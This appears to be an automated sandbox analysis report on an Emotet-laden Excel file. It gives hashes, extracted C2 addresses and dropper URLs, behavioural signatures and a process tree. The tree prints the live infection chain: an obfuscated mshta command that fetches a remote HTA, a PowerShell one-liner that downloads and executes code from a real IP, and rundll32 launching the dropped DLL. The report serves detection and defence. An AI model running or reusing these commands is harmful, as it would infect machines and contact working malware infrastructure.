Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    21-01-2022 15:04

General

  • Target

    TOP-010122 HTGW-210122.xls

  • Size

    70KB

  • MD5

    54a404bdf97dec3861e86661501de08f

  • SHA1

    d265c805ce856e563e54b014495ac663c9181d3c

  • SHA256

    8a07b30e84df7c4db85691e055e4f39fb78621392b7a282b3b64d13a675e14b1

  • SHA512

    09a4bcb74c1018711277aea44df07a25b751903bf97b27ecb16e30acfb9563219ec1c0f3d654095e8f8bc14224dcbd5247b8520bdb13fdb2ee7740049a647bc8

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://0xb907d607/fer/fe2.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://185.7.214.7/fer/fe2.png

Extracted

Family

emotet

Botnet

Epoch4

C2

131.100.24.231:80

209.59.138.75:7080

103.8.26.103:8080

51.38.71.0:443

212.237.17.99:8080

79.172.212.216:8080

207.38.84.195:8080

104.168.155.129:8080

178.79.147.66:8080

46.55.222.11:443

103.8.26.102:8080

192.254.71.210:443

45.176.232.124:443

203.114.109.124:443

51.68.175.8:8080

58.227.42.236:80

45.142.114.231:8080

217.182.143.207:443

178.63.25.185:443

45.118.115.99:8080

eck1.plain
ecs1.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 5 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 8 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 32 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 44 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\TOP-010122 HTGW-210122.xls"
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:736
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fe2.html
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:576
      • C:\Windows\SysWOW64\mshta.exe
        mshta http://0xb907d607/fer/fe2.html
        3⤵
        • Blocklisted process makes network request
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:1592
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/fer/fe2.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:296
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1964
            • C:\Windows\SysWow64\rundll32.exe
              C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
              6⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:1328
              • C:\Windows\SysWOW64\rundll32.exe
                C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer
                7⤵
                • Loads dropped DLL
                • Drops file in System32 directory
                • Suspicious use of WriteProcessMemory
                PID:1612
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ryobjmpmdjqi\yhxvuipmwswff.btn",WtzmGwFMVWZ
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:524
                  • C:\Windows\SysWOW64\rundll32.exe
                    C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ryobjmpmdjqi\yhxvuipmwswff.btn",DllRegisterServer
                    9⤵
                    • Blocklisted process makes network request
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1452

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Public\Documents\ssd.dll
    MD5

    5fc018538b34e891e67d7ccd6a6f5169

    SHA1

    f23a6451bdaf70ae014a4286b12e28f265bfe52d

    SHA256

    8187fdab6cf2ae48adace0a38973b64d2164aeddd5ee27eca0c55f5f8683bfaf

    SHA512

    066bf4475e852212bc2e7b24b38afbc42d49b8bbb00b6b69ec9845a9da5751e17fd961358daba946a24a5d61760fd32e0e7aff4c38c9f6297753ed2fe7a92301

  • \Users\Public\Documents\ssd.dll
    MD5

    5fc018538b34e891e67d7ccd6a6f5169

    SHA1

    f23a6451bdaf70ae014a4286b12e28f265bfe52d

    SHA256

    8187fdab6cf2ae48adace0a38973b64d2164aeddd5ee27eca0c55f5f8683bfaf

    SHA512

    066bf4475e852212bc2e7b24b38afbc42d49b8bbb00b6b69ec9845a9da5751e17fd961358daba946a24a5d61760fd32e0e7aff4c38c9f6297753ed2fe7a92301

  • \Users\Public\Documents\ssd.dll
    MD5

    5fc018538b34e891e67d7ccd6a6f5169

    SHA1

    f23a6451bdaf70ae014a4286b12e28f265bfe52d

    SHA256

    8187fdab6cf2ae48adace0a38973b64d2164aeddd5ee27eca0c55f5f8683bfaf

    SHA512

    066bf4475e852212bc2e7b24b38afbc42d49b8bbb00b6b69ec9845a9da5751e17fd961358daba946a24a5d61760fd32e0e7aff4c38c9f6297753ed2fe7a92301

  • \Users\Public\Documents\ssd.dll
    MD5

    5fc018538b34e891e67d7ccd6a6f5169

    SHA1

    f23a6451bdaf70ae014a4286b12e28f265bfe52d

    SHA256

    8187fdab6cf2ae48adace0a38973b64d2164aeddd5ee27eca0c55f5f8683bfaf

    SHA512

    066bf4475e852212bc2e7b24b38afbc42d49b8bbb00b6b69ec9845a9da5751e17fd961358daba946a24a5d61760fd32e0e7aff4c38c9f6297753ed2fe7a92301

  • \Users\Public\Documents\ssd.dll
    MD5

    5fc018538b34e891e67d7ccd6a6f5169

    SHA1

    f23a6451bdaf70ae014a4286b12e28f265bfe52d

    SHA256

    8187fdab6cf2ae48adace0a38973b64d2164aeddd5ee27eca0c55f5f8683bfaf

    SHA512

    066bf4475e852212bc2e7b24b38afbc42d49b8bbb00b6b69ec9845a9da5751e17fd961358daba946a24a5d61760fd32e0e7aff4c38c9f6297753ed2fe7a92301

  • \Users\Public\Documents\ssd.dll
    MD5

    5fc018538b34e891e67d7ccd6a6f5169

    SHA1

    f23a6451bdaf70ae014a4286b12e28f265bfe52d

    SHA256

    8187fdab6cf2ae48adace0a38973b64d2164aeddd5ee27eca0c55f5f8683bfaf

    SHA512

    066bf4475e852212bc2e7b24b38afbc42d49b8bbb00b6b69ec9845a9da5751e17fd961358daba946a24a5d61760fd32e0e7aff4c38c9f6297753ed2fe7a92301

  • \Users\Public\Documents\ssd.dll
    MD5

    5fc018538b34e891e67d7ccd6a6f5169

    SHA1

    f23a6451bdaf70ae014a4286b12e28f265bfe52d

    SHA256

    8187fdab6cf2ae48adace0a38973b64d2164aeddd5ee27eca0c55f5f8683bfaf

    SHA512

    066bf4475e852212bc2e7b24b38afbc42d49b8bbb00b6b69ec9845a9da5751e17fd961358daba946a24a5d61760fd32e0e7aff4c38c9f6297753ed2fe7a92301

  • \Users\Public\Documents\ssd.dll
    MD5

    5fc018538b34e891e67d7ccd6a6f5169

    SHA1

    f23a6451bdaf70ae014a4286b12e28f265bfe52d

    SHA256

    8187fdab6cf2ae48adace0a38973b64d2164aeddd5ee27eca0c55f5f8683bfaf

    SHA512

    066bf4475e852212bc2e7b24b38afbc42d49b8bbb00b6b69ec9845a9da5751e17fd961358daba946a24a5d61760fd32e0e7aff4c38c9f6297753ed2fe7a92301

  • \Users\Public\Documents\ssd.dll
    MD5

    5fc018538b34e891e67d7ccd6a6f5169

    SHA1

    f23a6451bdaf70ae014a4286b12e28f265bfe52d

    SHA256

    8187fdab6cf2ae48adace0a38973b64d2164aeddd5ee27eca0c55f5f8683bfaf

    SHA512

    066bf4475e852212bc2e7b24b38afbc42d49b8bbb00b6b69ec9845a9da5751e17fd961358daba946a24a5d61760fd32e0e7aff4c38c9f6297753ed2fe7a92301

  • memory/296-62-0x00000000024E0000-0x000000000312A000-memory.dmp
    Filesize

    12.3MB

  • memory/296-63-0x00000000024E0000-0x000000000312A000-memory.dmp
    Filesize

    12.3MB

  • memory/524-90-0x0000000000390000-0x00000000003B6000-memory.dmp
    Filesize

    152KB

  • memory/736-54-0x000000002FD91000-0x000000002FD94000-memory.dmp
    Filesize

    12KB

  • memory/736-55-0x00000000718F1000-0x00000000718F3000-memory.dmp
    Filesize

    8KB

  • memory/736-125-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/736-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/736-57-0x0000000076B81000-0x0000000076B83000-memory.dmp
    Filesize

    8KB

  • memory/1452-93-0x0000000000310000-0x0000000000336000-memory.dmp
    Filesize

    152KB

  • memory/1452-101-0x0000000002380000-0x00000000023A6000-memory.dmp
    Filesize

    152KB

  • memory/1452-99-0x0000000001ED0000-0x0000000001EF6000-memory.dmp
    Filesize

    152KB

  • memory/1452-97-0x0000000000650000-0x0000000000676000-memory.dmp
    Filesize

    152KB

  • memory/1452-95-0x0000000000370000-0x0000000000396000-memory.dmp
    Filesize

    152KB

  • memory/1612-79-0x00000000004B0000-0x00000000004D6000-memory.dmp
    Filesize

    152KB

  • memory/1612-88-0x00000000027B0000-0x00000000027D6000-memory.dmp
    Filesize

    152KB

  • memory/1612-85-0x00000000023A0000-0x00000000023C6000-memory.dmp
    Filesize

    152KB

  • memory/1612-83-0x0000000002340000-0x0000000002366000-memory.dmp
    Filesize

    152KB

  • memory/1612-81-0x0000000001E20000-0x0000000001E46000-memory.dmp
    Filesize

    152KB

  • memory/1612-77-0x0000000000200000-0x0000000000226000-memory.dmp
    Filesize

    152KB